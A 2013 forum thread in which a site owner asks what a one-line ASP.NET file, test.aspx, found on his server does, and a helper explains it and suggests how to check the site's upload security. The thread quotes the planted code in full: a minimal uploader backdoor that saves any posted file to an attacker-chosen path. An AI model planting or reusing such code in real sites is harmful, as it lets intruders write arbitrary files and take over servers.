Last post Nov 04, 2013 05:44 PM by AceCorban
Nov 04, 2013 04:44 PM|carlos16|LINK
a file was uploaded to my site somehow and had the following code . what does this mean
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
Nov 04, 2013 04:56 PM|AceCorban|LINK
This code checks to see if there is an HttpPostedFile in the Request Object, and if so, it saves it to the directory indicated by the querystring (or POST) parameter "f".
You are saying this file was uploaded to your site and it wasn't you? Does your site offer the ability to upload? This could be the start of someone trying to create a backdoor into your site.
Is this the only line in the file? What is it called?
Nov 04, 2013 05:06 PM|carlos16|LINK
thanks for the reply ... yes the file is called test.aspx ... i do not have any upload ability on the site .. i do allow the admin people to upload images only . how otherwise a file could be uploaded to my site
Nov 04, 2013 05:19 PM|AceCorban|LINK
Not exactly sure. Are you sure only images can be uploaded by admins? I had an issue a while back when a vulnerability in Plesk allowed someone to upload a modified version of jquery to my site which was employing an XSS technique to redirect my users.
That wasn't something I could fix in code as the exploit never went through my code. Hopefully some security experts on this can shed some light on this, because this seems like a pretty simple exploit...
Nov 04, 2013 05:38 PM|carlos16|LINK
well the site is hosted on window/ ii6 on farm hosting .. even to get to the admin area you must login. any help will be
Nov 04, 2013 05:44 PM|AceCorban|LINK
Well, to start, see what you can do to circumvent your own security checks (try to access the page that has upload in it whilst not logged in, try to upload a similar aspx page, etc).